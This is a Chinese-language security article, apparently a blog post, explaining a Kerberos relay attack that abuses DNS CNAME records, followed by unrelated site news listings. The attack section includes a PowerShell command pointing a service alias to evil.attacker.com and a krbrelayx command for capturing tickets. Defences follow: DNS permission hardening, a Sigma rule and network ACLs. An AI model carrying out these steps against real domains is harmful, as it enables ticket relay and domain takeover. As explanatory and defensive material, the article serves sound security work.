Kerberos中继攻击新变种:利用CNAME记录绕过防护
1. Kerberos中继攻击的演变与防护困境Kerberos协议作为企业网络中最广泛使用的身份验证机制之一其安全性一直备受关注。传统Kerberos中继攻击Kerberos Relay Attack通常需要攻击者能够拦截或重定向网络流量这使得攻击门槛相对较高。但最新披露的攻击技术通过巧妙利用DNS CNAME记录完全绕过了现有的大多数防护措施。这种新型攻击的核心在于攻击者无需直接控制网络流量而是通过操纵DNS系统中的别名记录CNAME来实现认证请求的劫持。具体来说攻击者可以在目标域中创建恶意的CNAME记录将合法服务名称指向攻击者控制的服务器诱使客户端向恶意服务器发起Kerberos认证请求关键区别传统中继攻击需要中间人(MITM)位置而新方法仅需DNS写入权限攻击面显著扩大。微软在2023年发布的AD安全指南中特别指出约78%的企业未对DNS记录修改设置足够严格的权限控制。这使得攻击者一旦获得低级域账户权限就可能通过DNS记录篡改为后续攻击铺路。2. CNAME记录如何成为攻击跳板2.1 DNS别名机制的安全盲区CNAME记录本意是提供灵活的域名映射能力允许将多个别名指向同一个规范名称。在Active Directory环境中服务主体名称(SPN)通常与主机A记录绑定而CNAME记录可以创建额外的SPN引用路径。攻击者利用的工作流程查询目标域中可写的DNS区域添加形如legit-svc.target.com CNAME evil-server.attacker.com的记录等待客户端请求legit-svc.target.com服务客户端的Kerberos请求被重定向到攻击者服务器攻击者获取到可用于中继的TGS票据2.2 与常规攻击的对比分析攻击特征传统中继攻击CNAME中继攻击所需权限网络中间人位置DNS记录写入权限检测难度较易(需持续流量劫持)较难(单次DNS修改)影响范围局部网络段整个域环境防护措施有效性网络层防护有效现有方案大多失效3. PoC技术细节与复现条件已公开的概念验证(PoC)代码显示攻击成功需要以下前置条件对目标域DNS区域具有写入权限的账户禁用或未正确配置DNS动态更新安全策略目标服务使用Kerberos认证且未启用SMB签名等附加保护典型攻击步骤# 1. 添加恶意CNAME记录 Add-DnsServerResourceRecordCName -ZoneName target.com -Name sql-svc -HostNameAlias evil.attacker.com # 2. 监听Kerberos请求 python krbrelayx.py -cname sql-svc.target.com # 3. 等待客户端连接并获取票据 # 4. 中继票据到其他关键服务(如域控)实测发现Windows客户端默认会优先尝试解析CNAME指向的地址而不会验证SPN与最终目标的匹配性这是协议层面的设计缺陷。4. 企业环境中的防御实践4.1 即时缓解措施对于已部署Active Directory的企业建议立即实施DNS权限加固# 限制DNS记录修改权限 dsacls DCDomainDnsZones,DCtarget,DCcom /G DOMAIN\DNS Admins:WP;;CNMicrosoftDNS,DCDomainDnsZones,DCtarget,DCcom启用DNS记录变更审计在所有关键服务上强制启用SMB签名和LDAP通道绑定4.2 长期架构改进网络分区将DNS服务器与常规域控制器分离实施最小权限原则监测规则创建Sigma规则检测异常CNAME记录添加行为title: Suspicious DNS CNAME Record Addition description: Detects creation of CNAME records pointing to external domains logsource: product: windows service: dns-server detection: selection: EventID: 5152 RecordType: CNAME HostNameAlias|contains: - .com - .net - .org condition: selection falsepositives: - Legitimate external service integrations level: high5. 协议层缺陷与未来防护方向Kerberos协议设计时未充分考虑DNS层级的信任问题这导致三个根本性挑战名称解析与认证解耦客户端仅验证服务票据的有效性不验证解析地址与SPN的关联性CNAME处理逻辑缺陷RFC 4120未明确规定CNAME解析后的SPN验证要求DNS动态更新缺乏强认证现有DNSSEC部署率不足5%微软已在其2024年Q2安全更新中开始测试Strict SPN Checking功能要求客户端验证服务票据中的sname字段最终连接目标的主机名DNS解析链中的所有CNAME记录对于无法立即升级的系统可采用网络设备级防护! Cisco IOS示例拦截异常Kerberos流量 access-list 150 deny tcp any eq 88 any gt 1024 access-list 150 deny udp any eq 88 any gt 1024 access-list 150 permit tcp any any established这种攻击方式的出现再次证明在复杂的企业IT环境中任何基础协议的单层防护都不足以应对现代威胁。防御者必须建立从DNS到应用层的纵深防御体系同时保持对协议级漏洞的前瞻性研究。

相关新闻

sosdp

sosdp

零、写在前面 随便写写。子集和超集和的计算就是高维前后缀和,子集反演超集反演的计算就是高维前后缀差分。还是比较easy的。 一、SOS DP 1.1 高维前缀和 SOS DP (Sum Over Subsets Dynamic Programming),也被称为高维前缀和,是算法竞赛中…

2026/9/23 6:56:53 阅读更多 →
XSS攻击全解析:从反射型到DOM型,实战攻防与防御策略

XSS攻击全解析:从反射型到DOM型,实战攻防与防御策略

1. 项目概述:为什么XSS攻击值得每个开发者警惕?如果你是一名Web开发者,或者负责过任何线上业务,那么“XSS”这个词对你来说一定不陌生。它就像悬在Web应用头顶的达摩克利斯之剑,看似古老,却总能以新的形式造…

2026/9/12 22:39:22 阅读更多 →
MT4/MT5回测报告怎么看?3分钟教你识别“造假“回测数据

MT4/MT5回测报告怎么看?3分钟教你识别“造假“回测数据

MT4/MT5回测报告怎么看?3分钟教你识别"造假"回测数据 很多人下载EA后第一件事就是跑回测,然后看到一条漂亮的盈利曲线就上头了。 停一下。市面上至少一半的回测报告是有问题的——不是数据造假,就是用了"完美条件"跑出来…

2026/9/20 10:11:44 阅读更多 →

最新新闻

STM32F4无感FOC低速优化:PLL锁相环替代滑膜观测器实战

STM32F4无感FOC低速优化:PLL锁相环替代滑膜观测器实战

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 9:22:36 阅读更多 →
Type-C接口5.1kΩ下拉电阻详解:原理、设计要点与故障排查

Type-C接口5.1kΩ下拉电阻详解:原理、设计要点与故障排查

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 9:22:36 阅读更多 →
ESP8266/ESP32多块MAX7219点阵屏级联驱动实战指南

ESP8266/ESP32多块MAX7219点阵屏级联驱动实战指南

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 9:22:36 阅读更多 →
网站测速全攻略:从原理到实战优化

网站测速全攻略:从原理到实战优化

1. 引言在互联网时代,网站加载速度直接影响用户体验、搜索引擎排名和业务转化率。无论是个人博客还是企业官网,测速都是优化性能的第一步。本文将从测速原理、常用工具、关键指标到优化实践,系统讲解网站测速的完整方法论。2. 为什么网站测速…

2026/9/24 9:22:36 阅读更多 →
FT232R驱动安装与调试全攻略:从原理到避坑实践

FT232R驱动安装与调试全攻略:从原理到避坑实践

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 9:22:36 阅读更多 →
新手搞懂 HLS 的 DVR 回看,直播时移常见踩坑

新手搞懂 HLS 的 DVR 回看,直播时移常见踩坑

一、什么是直播 DVR 时移回看 很多监控直播、网课直播产品有回看功能,也就是 DVR 时移。通俗讲:直播正在播出,用户可以拖动进度条,回看几分钟、几十分钟之前已经播过的历史画面。点播视频全部分片提前生成好;而直播 D…

2026/9/24 9:21:35 阅读更多 →

日新闻

基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程

基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程

简介:这是一套面向计算机、人工智能、自动化等专业学生与教师的毕业设计级项目资源,围绕YOLOv8实现渔船作业监控系统,可用于毕设、课程设计、大作业或项目立项演示。压缩包共97个文件,约24.21MB,以70个Python源码文件为…

2026/9/24 0:00:19 阅读更多 →
单细胞注释实战:基于Scanpy的标记基因与参考映射流程解析

单细胞注释实战:基于Scanpy的标记基因与参考映射流程解析

简介:一份基于单细胞RNA测序数据的细胞类型注释算法研究Python毕业设计源码,针对计算机相关专业正在做毕设或需要项目实战的学习者,可用于课程设计与期末大作业。项目代码完整、经导师指导评审通过,可直接运行,覆盖数据…

2026/9/24 0:00:19 阅读更多 →
C#源生成器实战:用增量生成器替代反射,告别AOT崩溃

C#源生成器实战:用增量生成器替代反射,告别AOT崩溃

第一次在项目里被反射卡住,是在一个老旧的WinForms模块里:几十个类依赖PropertyChanged通知,运行时反射读属性、发通知,每次启动慢半拍不说,一上.NET Native/AOT裁剪模式几乎全面崩盘。后来我把这段逻辑全部改成C#源生…

2026/9/24 0:00:19 阅读更多 →

周新闻

Flutter for OpenHarmony游戏卡片渐变背景实战:从原理到性能优化

Flutter for OpenHarmony游戏卡片渐变背景实战:从原理到性能优化

直接铺开项目本身吧。这几个月我一直在折腾一件事:用Flutter给OpenHarmony做一款游戏集合类的App,说白了就是把若干小游戏塞进一个壳里,用统一入口分发。这个方向本身不算新鲜,真正让我花了不少心思的,是首页那堆游戏卡…

2026/9/23 4:55:02 阅读更多 →
Word表格编号全攻略:从列表编号到题注交叉引用

Word表格编号全攻略:从列表编号到题注交叉引用

写Word文档,最让人头疼的往往是那些“看起来不起眼”的小问题。比如表格编号这事:今天在表后面多加了两个空白行,明天给客户交稿前发现整个章节的编号全部错位,光是挨个改序号就能耗掉大半个下午。我前阵子帮人整理一份上百页的技…

2026/9/24 9:10:42 阅读更多 →
从第一个站到第二个站:独立开发者的静态网站选型与落地实践

从第一个站到第二个站:独立开发者的静态网站选型与落地实践

1. 项目概述1.1 核心需求解析做独立开发者这几年,说实话,第一个网站上线的那天晚上我兴奋得没睡着。但等它跑了半年,流量惨淡、功能臃肿、代码自己都懒得看第二遍之后,我才慢慢琢磨明白一个道理:第一个网站是练手&…

2026/9/23 9:53:41 阅读更多 →

月新闻

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能分类:[AI/大模型]细分主题:AI 增强型 CI/CD 流水线自动化与 GitOps 实践:Agent 工作流、工具调用与任务拆解:从原型到生产的验收清单很多团队在尝试用大…

2026/9/23 9:53:40 阅读更多 →
容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场

容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场

容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场分类:[工程技术]细分主题:Kubernetes 生产环境运维与排障实战:可复制的项目复盘模板与决策记录大部分团队的事故复盘报告,最后都变成了躺在 Confluence 或钉…

2026/9/23 9:53:40 阅读更多 →
容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步

容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步

容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步分类:[工程技术]细分主题:Docker 容器化技术与镜像安全管理:核心链路的逐步实现与关键代码取舍面对一个积累了五六年历史包袱的单体架构应用(包含 Web 接口、后台…

2026/9/23 9:53:40 阅读更多 →